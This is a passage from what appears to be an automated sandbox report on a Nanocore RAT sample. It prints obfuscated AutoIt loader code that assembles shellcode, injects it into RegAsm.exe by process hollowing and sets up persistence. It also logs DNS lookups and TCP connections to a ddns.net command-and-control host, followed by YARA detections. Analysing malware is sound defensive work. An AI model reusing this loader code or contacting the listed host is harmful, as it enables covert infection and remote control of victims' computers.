("3,6..,6,6..,6,..6..1,..56,..3..,..5..3,..5..3..,..6..1..,..58..,53..,6..,6,..6..0..,58,4,6..1..,..6,6..,58,5..8,..6..2..,5..7.." , ".." ) ) ISPTR (2376345 + 4293184136 ) $656182541 = 1747756201 ISPTR (2313154 * 2822069 + 423786 ) ENDIF IF $656182541 = 2060391673 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..7..,5..8..,..1..,..53,..61..,62,..6..1,..58..,..5..7..,..5..3..,..6..,6..,..6..,..6..,6..,..6..,..61,4..,..57..,58..,62..,..5..3,61,62..,..61.." , ".." ) ) INT (690914 ) $656182541 = 954977294 DIM $LM4EZYM8LLI3BGXYVHLT = 367976 ENDIF IF $656182541 = 2069227035 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53,..6,6,..6..0..,..59,..5..8..,5..3,6,6..,..6..0..,..59..,..5..6,..5..7,..6,6,..60..,..5..8,..4..,..61,..6,6,..58,5..8,..3..,..5..3.." , ".." ) ) STRING (3068014 * 2377603 * 2825303 ) $656182541 = 762027222 ENDIF IF $656182541 = 2081176827 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3,5..7,..58..,6..1,..5,2,5..3..,3,..1..,..62..,53..,..53..,..5..3,5..3,..5..3..,5..3..,57,..53..,5..9,1,5..3..,..53,5..8,61,5..3.." , ".." ) ) $656182541 = 1061461686 ENDIF IF $656182541 = 2119340110 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6..0,..58..,..5..3..,..56,..5..6..,..5..6..,6,6,..57,..6..0,56..,5..6,..4..,55..,..61,..6..2,..6..0,4..,..6..,..5..7..,56,..56,3..,..53,6..1" , ".." ) ) MOD (13383 , 840807 ) $656182541 = 217336870 RANDOM (204136 ) RANDOM (3648981 ) ENDIF NEXT IF $PROTECT THEN ACL ($HANDLEFROMPID ) ENDIF IF $PERSIST THEN QTMVSHRFRD ($RET [ZVTZJDNXHRPQQIM ("53" ) ] ) ENDIF ENDFUNC #endregion FUNC BFSEZOFQQVRV () GLOBAL $1300820860 = 256356752 GLOBAL $AOAMUJVLTV = 2033156 FOR $E = 0 TO 551583 ISPTR (1420540 + 2012189 + 4291840624 + 4292863764 ) IF $1300820860 = 176683708 THEN RETURN EXECUTE (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("2..,..35,4..6,..1..,14,4" , ".." ) ) ) EXITLOOP MOD (2197646 , 498204 ) ENDIF IF $1300820860 = 256356752 THEN #region TuBoprHKA $1300820860 = 176683708 INT (2436641 ) STRING (3043919 * 1765421 ) ENDIF NEXT ENDFUNC FUNC QUBCAHBBZKYJ () RETURN EXECUTE (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("2,..3..5,4..6,..15..,1..8.." , ".." ) ) ) ENDFUNC FUNC DDKWOYMJJPNF () RETURN EXECUTE (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("2,..3..5..,..4..6,24..,15,18" , ".." ) ) ) ENDFUNC FUNC JWWTSBPFTDYX () RETURN EXECUTE (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("4,38..,..38,3,..2..7..,..38,..3..8" , ".." ) ) ) ENDFUNC FUNC CRAYOQRFEAMS () RETURN EXECUTE (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("4..,..3..8,38..,..1..9,..46..,..4..4,..47,29,46,3..,..44..,..31..,27..,4..6,..31.." , ".." ) ) ) ENDFUNC FUNC BVMQYYKUKURA () RETURN EXECUTE (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("4..,38..,38,..19..,46..,..44..,4..7..,2..9,..46..,7,3..1,4..6,..4..,..2..7..,4..6..,..27" , ".." ) ) ) ENDFUNC FUNC YRBQDBYJGKXS () RETURN EXECUTE (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6,3..5,38,3..1..,..3,38..,..41,..4..5..,3..1.." , ".." ) ) ) ENDFUNC FUNC SHYKZNWGXGSG () GLOBAL $1300820860 = 256356752 GLOBAL $PNXRSOATLI = 3486648 FOR $E = 0 TO 710159 DIM $HNMUDSVCSZ60IMVSF3YB = "JUZSyHbRCVfD3MxDgsoFWuxv2gw74drr0V" IF $1300820860 = 176683708 THEN #endregion STRING (2638799 + 3112428 * 2601353 * 1450734 ) EXITLOOP STRING ("JjEEpwD0sldXzDXNhfDgDNElaETEFzwJOeSiuprG3WvIq9zkdSH33hE5NsEUM8u2YChuWOs1Y7nRr64bfIBX2CRHJWDcVH44BDUY1eyyzQf53XNSxCOdG" ) ENDIF IF $1300820860 = 256356752 THEN RETURN EXECUTE (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6,3..5..,3..8,3..1,3,..4..4..,..31..,27..,46..,3..1..,1..9,34,4..1..,..44,..4..6,29..,..47,4..6.." , ".." ) ) ) STRING (2299404 * 720385 + 391200 + 212652 ) $1300820860 = 176683708 DIM $JAJDWMXWNWIVNS20W4DY = 182921 ENDIF NEXT ENDFUNC FUNC MNIAOQEHLRXV () GLOBAL $1300820860 = 256356752 GLOBAL $NJJZ2JH0FR = 1612056 FOR $E = 0 TO 1284805 ISSTRING ("79591zMXxm6utXd1RVZnLH4ensov8n63URAdwtGXFWAOMnFTnB6iN6kyf1WIkqZjpdJMvaExncR0goAaWFhFqYoYFc8EH8M" ) IF $1300820860 = 176683708 THEN RETURN EXECUTE (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6,..3..5..,..3..8..,..31,..5..,50..,..3..5..,..4..5,4..6,..4..5.." , ".." ) ) ) EXITLOOP ENDIF IF $1300820860 = 256356752 THEN #endregion WINEXISTS ("n7I4Lour0AVXNis2AYWhtb90pyB2ZZ0w3i4IS3MIkUheWk" ) $1300820860 = 176683708 ISBINARY ("V0Wel8SOmXCCbJy4FoUjGlm6I35eeAunz1fFgeSK9ozWRrgDwqB24oAJNZErcNJWBockE2XBFjksWzorXARX8BskAF2rIzHvNMtCo69EDawVehXnJmEL" ) PTR ("1T99E2gKZNifWc1Als7fHgsSORw56x1YtFxmaE9ipjpDOhXkMkVD15yUAquXFlOAXtWpOOAQtZZx0ZcG3lrVMw7xhMVTklLeDYRvuGF7Tekbga3L" ) ENDIF NEXT ENDFUNC FUNC AZMTVPRVIOXM () RETURN EXECUTE (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6..,35..,38,31..,..15,4..2..,..31..,40.." , ".." ) ) ) ENDFUNC FUNC WCCBBCANDNZP () RETURN EXECUTE (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6..,3..5,..38..,3..1..,..18,3..1,..27,3..0.." , ".." ) ) ) ENDFUNC FUNC ZPVYEEXEUEWT () RETURN EXECUTE (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6,..3..5,..38,..31..,..23..,44..,..3..5,4..6,3..1.." , ".." ) ) ) ENDFUNC FUNC YYEUJPRYPKCM () RETURN EXECUTE (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("9,40,31..,..46,7..,3..1..,46.." , ".." ) ) ) ENDFUNC FUNC IGCFQUUWMEAF () RETURN EXECUTE (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("9,..4..5,1,3..0..,3..9,..3..5,..4..0.." , ".." ) ) ) ENDFUNC FUNC CJCCIDDEPTLC () RETURN EXECUTE (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("1..3,..45..,33,..2..,..41,5..0.." , ".." ) ) ) ENDFUNC FUNC ZPLPQGYBGRDG () GLOBAL $1300820860 = 256356752 GLOBAL $T34YZVYIB3 = 3599293 FOR $E = 0 TO 2828683 MOD (3030196 , 3600226 ) IF $1300820860 = 176683708 THEN #endregion EXITLOOP STRING (1287972 + 4294142251 ) ENDIF IF $1300820860 = 256356752 THEN RETURN EXECUTE (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("1..6,..4..4..,4..1..,29..,..3..1,..45,..45,3..,3..8..,..4..1,..45,..31.." , ".." ) ) ) DIM $TJEWRRKJAQ96YDEBIBZV = 434386 $1300820860 = 176683708 ISBOOL (2151701 + 4291471136 + 851125 ) ENDIF NEXT ENDFUNC FUNC QHMGHXJZKQDS () RETURN EXECUTE (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("16,4..4,..41..,2..9..,..3..1..,..4..5,..4..5,5..,..50,35,..45,..4..6,4..5" , ".." ) ) ) ENDFUNC GLOBAL $1300820860 = 256356752 GLOBAL $MI14JTB1SP = 2992520 FOR $E = 0 TO 3837253 IF $1300820860 = 176683708 THEN #endregion EXITLOOP ENDIF IF $1300820860 = 256356752 THEN #region nsziBMbqjH PTR (3821692 * 2598776 + 4292133915 * 233491 ) $1300820860 = 176683708 STRING ("Yzk4VX0LZuJBt2qbtlaAepvgq9LqXiBJ96lIam" ) ENDIF NEXT FUNC RQBFMRVGXJYI () RETURN EXECUTE (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("1..8,..27,..4..0..,30..,41,..39.." , ".." ) ) ) ENDFUNC FUNC HGMGWWTPDNOR () GLOBAL $1300820860 = 256356752 GLOBAL $BKLQZCBPLW = 492947 FOR $E = 0 TO 3060378 IF $1300820860 = 176683708 THEN RETURN EXECUTE (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("18,31..,..3..3..,23..,4..4,3..5,..4..6..,31" , ".." ) ) ) EXITLOOP DIM $YR3ACXQSBGBXZBI46ETW = 3229433 * 3554240 * 819568 + 2784574 + 4292975588 ENDIF IF $1300820860 = 256356752 THEN #endregion CHR (142645 ) $1300820860 = 176683708 ENDIF NEXT ENDFUNC FUNC RMOEECIWZOYF () RETURN EXECUTE (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("1..9..,..3..4..,..3..1,..3..8,..38..,..5,..50..,31,29..,..4..7,46..,..3..1" , ".." ) ) ) ENDFUNC FUNC QDGSBIXASIOK () RETURN EXECUTE (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("1..9..,..38,31..,3..1..,..4..2.." , ".." ) ) ) ENDFUNC FUNC MSSFBHBPZKOB () RETURN EXECUTE (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("19..,46,..44,3..5,..4..0,3..3..,9..,..4..0,..19..,..46,..4..4.." , ".." ) ) ) ENDFUNC FUNC ZEBJKFZIPAFI () RETURN EXECUTE (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("21,2..,..41..,..4..7..,4..0..,3..0.." , ".." ) ) ) ENDFUNC FUNC XZRGVRFNYRGX () RETURN EXECUTE (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("2..3..,3..5,..40,..5..,..50..,..35..,45,..4..6,45" , ".." ) ) ) ENDFUNC FUNC ZVTZJDNXHRPQQIM ($STR ) GLOBAL $113519199 = 256356752 GLOBAL $JVAIKJVNZJ = 3556081 FOR $E = 0 TO 482371 CHR (3033401 ) IF $113519199 = 176683708 THEN LOCAL $SPLIT = STRINGSPLIT ($ALPHABET , "" ) $113519199 = 1300820860 ENDIF IF $113519199 = 256356752 THEN LOCAL $ALPHABET = LUXBZMCWKPOC ("A..B..CD..EFG..HIJ..K..L..M..NO..PQ..RS..T..U..V..W..XY..Zabc..de..fghi..jkl..mno..p..q..r..s..t..u..v..wx..y..z0..1..2..34..5..6..78..9.." , ".." ) $113519199 = 176683708 RANDOM (3170570 ) ENDIF IF $113519199 = 1203322726 THEN LOCAL $RESULT ISPTR ("MdWUnM2DmvZ9vMRlMDwEmfG5K8YyzTWuomWSqd0kvm11oHphqKe2zZMGF0joYDdDIDVj095INmj9oORdTQhZN45yJplA4Kv2jws" ) EXITLOOP DIM $RQQEONQMS0IGFHVOZOIW = 2269440 ENDIF IF $113519199 = 1300820860 THEN LOCAL $STRINGSPLITTED = STRINGSPLIT ($STR , "," ) ISSTRING (162997 + 3383337 * 1470645 * 1064176 ) $113519199 = 1203322726 PTR ("QSS66vrYfoF4GNlz" ) ISSTRING ("lwzXBDmZ3TEfR80NLNBm17KV5tSU0eSx6sDusjE2e8lFbY0OvV5cb99oWO1hVB9ZahjyEEvCjJh2VfThCdyfjOv7toINswhM9wE4" ) ENDIF DIM $YB3B1GCR5UORC3OVVLEQ = 3765422 * 671547 * 1819674 + 4291390693 + 4292645635 * 1791171 + 3593431 NEXT FOR $I = "1" TO UBOUND ($STRINGSPLITTED ) - "1" $RESULT &= $SPLIT [$STRINGSPLITTED [$I ] ] NEXT RETURN $RESULT ENDFUNC DIM $IXPAPBPRCQQTJUQXZZQGEHEIOBIJTCJK LOCAL $STARTUPDIR = @USERPROFILEDIR & "\hdwwiz" LOCAL $BOOL = @SCRIPTDIR = $STARTUPDIR "True" "False" UCZPRNKTQP ("WinSAT" , "DiagnosticsHub.StandardCollector.Service.exe" ) $IXPAPBPRCQQTJUQXZZQGEHEIOBIJTCJK = URQHLYEYWJ ("0x494D4A504443546C" , "0x706D41484E505A786C49734E69595578575566536C475879594457574F615A67" , "10" ) DIM $LIUIVFNQUPEO = EXECUTE ("@HomeDrive & "\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"" ) DIM $EMYXOKTBATHL = EXECUTE ("@HomeDrive & "\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"" ) IF FILEEXISTS ($LIUIVFNQUPEO ) THEN RUNPE ($LIUIVFNQUPEO , $IXPAPBPRCQQTJUQXZZQGEHEIOBIJTCJK , FALSE , TRUE ) ELSEIF FILEEXISTS ($EMYXOKTBATHL ) THEN RUNPE ($EMYXOKTBATHL , $IXPAPBPRCQQTJUQXZZQGEHEIOBIJTCJK , FALSE , TRUE ) ENDIF DJXLPTMAOK () FUNC DJXLPTMAOK ()

                                                                                          Network Behavior

                                                                                          Network Port Distribution

                                                                                          TCP Packets

                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                          Nov 19, 2020 01:52:30.663995028 CET4971520377192.168.2.787.65.28.27
                                                                                          Nov 19, 2020 01:52:33.672907114 CET4971520377192.168.2.787.65.28.27
                                                                                          Nov 19, 2020 01:52:39.689816952 CET4971520377192.168.2.787.65.28.27
                                                                                          Nov 19, 2020 01:52:50.012203932 CET4972720377192.168.2.787.65.28.27
                                                                                          Nov 19, 2020 01:52:53.018296003 CET4972720377192.168.2.787.65.28.27
                                                                                          Nov 19, 2020 01:52:59.034399986 CET4972720377192.168.2.787.65.28.27
                                                                                          Nov 19, 2020 01:53:08.341140985 CET4973020377192.168.2.787.65.28.27
                                                                                          Nov 19, 2020 01:53:11.332464933 CET4973020377192.168.2.787.65.28.27
                                                                                          Nov 19, 2020 01:53:17.426786900 CET4973020377192.168.2.787.65.28.27
                                                                                          Nov 19, 2020 01:53:42.495999098 CET4974820377192.168.2.787.65.28.27
                                                                                          Nov 19, 2020 01:53:45.507028103 CET4974820377192.168.2.787.65.28.27
                                                                                          Nov 19, 2020 01:53:51.523511887 CET4974820377192.168.2.787.65.28.27
                                                                                          Nov 19, 2020 01:53:59.261042118 CET4975120377192.168.2.787.65.28.27
                                                                                          Nov 19, 2020 01:54:02.274269104 CET4975120377192.168.2.787.65.28.27
                                                                                          Nov 19, 2020 01:54:08.290158033 CET4975120377192.168.2.787.65.28.27
                                                                                          Nov 19, 2020 01:54:17.969947100 CET4975320377192.168.2.787.65.28.27
                                                                                          Nov 19, 2020 01:54:20.978811026 CET4975320377192.168.2.787.65.28.27
                                                                                          Nov 19, 2020 01:54:26.994798899 CET4975320377192.168.2.787.65.28.27

                                                                                          UDP Packets

                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                          Nov 19, 2020 01:52:20.556395054 CET5805253192.168.2.78.8.8.8
                                                                                          Nov 19, 2020 01:52:20.569623947 CET53580528.8.8.8192.168.2.7
                                                                                          Nov 19, 2020 01:52:21.619240999 CET5400853192.168.2.78.8.8.8
                                                                                          Nov 19, 2020 01:52:21.631486893 CET53540088.8.8.8192.168.2.7
                                                                                          Nov 19, 2020 01:52:23.014729023 CET5945153192.168.2.78.8.8.8
                                                                                          Nov 19, 2020 01:52:23.027920961 CET53594518.8.8.8192.168.2.7
                                                                                          Nov 19, 2020 01:52:24.206804037 CET5291453192.168.2.78.8.8.8
                                                                                          Nov 19, 2020 01:52:24.219973087 CET53529148.8.8.8192.168.2.7
                                                                                          Nov 19, 2020 01:52:25.068202019 CET6456953192.168.2.78.8.8.8
                                                                                          Nov 19, 2020 01:52:25.081556082 CET53645698.8.8.8192.168.2.7
                                                                                          Nov 19, 2020 01:52:30.631275892 CET5281653192.168.2.78.8.8.8
                                                                                          Nov 19, 2020 01:52:30.651945114 CET53528168.8.8.8192.168.2.7
                                                                                          Nov 19, 2020 01:52:31.536803007 CET5078153192.168.2.78.8.8.8
                                                                                          Nov 19, 2020 01:52:31.549947977 CET53507818.8.8.8192.168.2.7
                                                                                          Nov 19, 2020 01:52:32.238909006 CET5423053192.168.2.78.8.8.8
                                                                                          Nov 19, 2020 01:52:32.252537012 CET53542308.8.8.8192.168.2.7
                                                                                          Nov 19, 2020 01:52:32.734786034 CET5491153192.168.2.78.8.8.8
                                                                                          Nov 19, 2020 01:52:32.773921967 CET53549118.8.8.8192.168.2.7
                                                                                          Nov 19, 2020 01:52:33.084186077 CET4995853192.168.2.78.8.8.8
                                                                                          Nov 19, 2020 01:52:33.097460985 CET53499588.8.8.8192.168.2.7
                                                                                          Nov 19, 2020 01:52:34.630846977 CET5086053192.168.2.78.8.8.8
                                                                                          Nov 19, 2020 01:52:34.647241116 CET53508608.8.8.8192.168.2.7
                                                                                          Nov 19, 2020 01:52:35.551826000 CET5045253192.168.2.78.8.8.8
                                                                                          Nov 19, 2020 01:52:35.564193010 CET53504528.8.8.8192.168.2.7
                                                                                          Nov 19, 2020 01:52:36.234267950 CET5973053192.168.2.78.8.8.8
                                                                                          Nov 19, 2020 01:52:36.247414112 CET53597308.8.8.8192.168.2.7
                                                                                          Nov 19, 2020 01:52:36.915190935 CET5931053192.168.2.78.8.8.8
                                                                                          Nov 19, 2020 01:52:36.928962946 CET53593108.8.8.8192.168.2.7
                                                                                          Nov 19, 2020 01:52:38.098931074 CET5191953192.168.2.78.8.8.8
                                                                                          Nov 19, 2020 01:52:38.111999035 CET53519198.8.8.8192.168.2.7
                                                                                          Nov 19, 2020 01:52:39.109504938 CET6429653192.168.2.78.8.8.8
                                                                                          Nov 19, 2020 01:52:39.122490883 CET53642968.8.8.8192.168.2.7
                                                                                          Nov 19, 2020 01:52:49.947350025 CET5668053192.168.2.78.8.8.8
                                                                                          Nov 19, 2020 01:52:49.960371971 CET53566808.8.8.8192.168.2.7
                                                                                          Nov 19, 2020 01:52:53.468233109 CET5882053192.168.2.78.8.8.8
                                                                                          Nov 19, 2020 01:52:53.480763912 CET53588208.8.8.8192.168.2.7
                                                                                          Nov 19, 2020 01:53:08.317718983 CET6098353192.168.2.78.8.8.8
                                                                                          Nov 19, 2020 01:53:08.339587927 CET53609838.8.8.8192.168.2.7
                                                                                          Nov 19, 2020 01:53:09.292503119 CET4924753192.168.2.78.8.8.8
                                                                                          Nov 19, 2020 01:53:09.311260939 CET53492478.8.8.8192.168.2.7
                                                                                          Nov 19, 2020 01:53:09.859353065 CET5228653192.168.2.78.8.8.8
                                                                                          Nov 19, 2020 01:53:09.872359991 CET53522868.8.8.8192.168.2.7
                                                                                          Nov 19, 2020 01:53:18.666498899 CET5606453192.168.2.78.8.8.8
                                                                                          Nov 19, 2020 01:53:18.685097933 CET53560648.8.8.8192.168.2.7
                                                                                          Nov 19, 2020 01:53:22.698599100 CET6374453192.168.2.78.8.8.8
                                                                                          Nov 19, 2020 01:53:22.711711884 CET53637448.8.8.8192.168.2.7
                                                                                          Nov 19, 2020 01:53:23.303586006 CET6145753192.168.2.78.8.8.8
                                                                                          Nov 19, 2020 01:53:23.316716909 CET53614578.8.8.8192.168.2.7
                                                                                          Nov 19, 2020 01:53:23.870199919 CET5836753192.168.2.78.8.8.8
                                                                                          Nov 19, 2020 01:53:23.883336067 CET53583678.8.8.8192.168.2.7
                                                                                          Nov 19, 2020 01:53:24.228388071 CET6059953192.168.2.78.8.8.8
                                                                                          Nov 19, 2020 01:53:24.244683027 CET53605998.8.8.8192.168.2.7
                                                                                          Nov 19, 2020 01:53:24.615070105 CET5957153192.168.2.78.8.8.8
                                                                                          Nov 19, 2020 01:53:24.627950907 CET53595718.8.8.8192.168.2.7
                                                                                          Nov 19, 2020 01:53:25.234616041 CET5268953192.168.2.78.8.8.8
                                                                                          Nov 19, 2020 01:53:25.247924089 CET53526898.8.8.8192.168.2.7
                                                                                          Nov 19, 2020 01:53:25.800698996 CET5029053192.168.2.78.8.8.8
                                                                                          Nov 19, 2020 01:53:25.814448118 CET53502908.8.8.8192.168.2.7
                                                                                          Nov 19, 2020 01:53:25.927921057 CET6042753192.168.2.78.8.8.8
                                                                                          Nov 19, 2020 01:53:25.956685066 CET53604278.8.8.8192.168.2.7
                                                                                          Nov 19, 2020 01:53:27.075440884 CET5620953192.168.2.78.8.8.8
                                                                                          Nov 19, 2020 01:53:27.088359118 CET53562098.8.8.8192.168.2.7
                                                                                          Nov 19, 2020 01:53:28.009876013 CET5958253192.168.2.78.8.8.8
                                                                                          Nov 19, 2020 01:53:28.022838116 CET53595828.8.8.8192.168.2.7
                                                                                          Nov 19, 2020 01:53:28.723932981 CET6094953192.168.2.78.8.8.8
                                                                                          Nov 19, 2020 01:53:28.736712933 CET53609498.8.8.8192.168.2.7
                                                                                          Nov 19, 2020 01:53:42.481102943 CET5854253192.168.2.78.8.8.8
                                                                                          Nov 19, 2020 01:53:42.493982077 CET53585428.8.8.8192.168.2.7
                                                                                          Nov 19, 2020 01:53:46.921571970 CET5917953192.168.2.78.8.8.8
                                                                                          Nov 19, 2020 01:53:46.955610991 CET53591798.8.8.8192.168.2.7
                                                                                          Nov 19, 2020 01:53:52.810319901 CET6092753192.168.2.78.8.8.8
                                                                                          Nov 19, 2020 01:53:52.823323965 CET53609278.8.8.8192.168.2.7
                                                                                          Nov 19, 2020 01:53:59.238854885 CET5785453192.168.2.78.8.8.8
                                                                                          Nov 19, 2020 01:53:59.259284973 CET53578548.8.8.8192.168.2.7
                                                                                          Nov 19, 2020 01:54:10.956798077 CET6202653192.168.2.78.8.8.8
                                                                                          Nov 19, 2020 01:54:10.969027996 CET53620268.8.8.8192.168.2.7
                                                                                          Nov 19, 2020 01:54:17.954452991 CET5945353192.168.2.78.8.8.8
                                                                                          Nov 19, 2020 01:54:17.968158007 CET53594538.8.8.8192.168.2.7

                                                                                          DNS Queries

                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                          Nov 19, 2020 01:52:30.631275892 CET192.168.2.78.8.8.80x9826Standard query (0)windowslivesoffice.ddns.netA (IP address)IN (0x0001)
                                                                                          Nov 19, 2020 01:52:49.947350025 CET192.168.2.78.8.8.80x5348Standard query (0)windowslivesoffice.ddns.netA (IP address)IN (0x0001)
                                                                                          Nov 19, 2020 01:53:08.317718983 CET192.168.2.78.8.8.80xda6fStandard query (0)windowslivesoffice.ddns.netA (IP address)IN (0x0001)
                                                                                          Nov 19, 2020 01:53:42.481102943 CET192.168.2.78.8.8.80x91a6Standard query (0)windowslivesoffice.ddns.netA (IP address)IN (0x0001)
                                                                                          Nov 19, 2020 01:53:59.238854885 CET192.168.2.78.8.8.80xf654Standard query (0)windowslivesoffice.ddns.netA (IP address)IN (0x0001)
                                                                                          Nov 19, 2020 01:54:17.954452991 CET192.168.2.78.8.8.80x60d0Standard query (0)windowslivesoffice.ddns.netA (IP address)IN (0x0001)

                                                                                          DNS Answers

                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                          Nov 19, 2020 01:52:30.651945114 CET8.8.8.8192.168.2.70x9826No error (0)windowslivesoffice.ddns.net87.65.28.27A (IP address)IN (0x0001)
                                                                                          Nov 19, 2020 01:52:49.960371971 CET8.8.8.8192.168.2.70x5348No error (0)windowslivesoffice.ddns.net87.65.28.27A (IP address)IN (0x0001)
                                                                                          Nov 19, 2020 01:53:08.339587927 CET8.8.8.8192.168.2.70xda6fNo error (0)windowslivesoffice.ddns.net87.65.28.27A (IP address)IN (0x0001)
                                                                                          Nov 19, 2020 01:53:42.493982077 CET8.8.8.8192.168.2.70x91a6No error (0)windowslivesoffice.ddns.net87.65.28.27A (IP address)IN (0x0001)
                                                                                          Nov 19, 2020 01:53:59.259284973 CET8.8.8.8192.168.2.70xf654No error (0)windowslivesoffice.ddns.net87.65.28.27A (IP address)IN (0x0001)
                                                                                          Nov 19, 2020 01:54:17.968158007 CET8.8.8.8192.168.2.70x60d0No error (0)windowslivesoffice.ddns.net87.65.28.27A (IP address)IN (0x0001)

                                                                                          Code Manipulations

                                                                                          Statistics

                                                                                          Behavior

                                                                                          Click to jump to process

                                                                                          System Behavior

                                                                                          Analysis Process: e5bd3238d220c97cd4d6969abb3b33e0.exe PID: 2152 Parent PID: 5632

                                                                                          General

                                                                                          Start time:01:52:25
                                                                                          Start date:19/11/2020
                                                                                          Path:C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:'C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe'
                                                                                          Imagebase:0x9c0000
                                                                                          File size:1124888 bytes
                                                                                          MD5 hash:7B00ED250C793C95F4D98C637302FB6F
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000003.255245662.0000000001569000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000003.255245662.0000000001569000.00000004.00000001.sdmp, Author: Joe Security
                                                                                          • Rule: NanoCore, Description: unknown, Source: 00000000.00000003.255245662.0000000001569000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000003.254485711.00000000015B3000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000003.254485711.00000000015B3000.00000004.00000001.sdmp, Author: Joe Security
                                                                                          • Rule: NanoCore, Description: unknown, Source: 00000000.00000003.254485711.00000000015B3000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000003.254593335.00000000015B3000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000003.254593335.00000000015B3000.00000004.00000001.sdmp, Author: Joe Security
                                                                                          • Rule: NanoCore, Description: unknown, Source: 00000000.00000003.254593335.00000000015B3000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000003.254905980.0000000001537000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000003.254905980.0000000001537000.00000004.00000001.sdmp, Author: Joe Security
                                                                                          • Rule: NanoCore, Description: unknown, Source: 00000000.00000003.254905980.0000000001537000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000003.256228628.00000000040B2000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000003.256228628.00000000040B2000.00000040.00000001.sdmp, Author: Joe Security
                                                                                          • Rule: NanoCore, Description: unknown, Source: 00000000.00000003.256228628.00000000040B2000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000003.254259059.0000000001589000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000003.254259059.0000000001589000.00000004.00000001.sdmp, Author: Joe Security
                                                                                          • Rule: NanoCore, Description: unknown, Source: 00000000.00000003.254259059.0000000001589000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000003.254233252.0000000001613000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000003.254233252.0000000001613000.00000004.00000001.sdmp, Author: Joe Security
                                                                                          • Rule: NanoCore, Description: unknown, Source: 00000000.00000003.254233252.0000000001613000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000002.517282808.00000000014E1000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000002.517282808.00000000014E1000.00000004.00000001.sdmp, Author: Joe Security
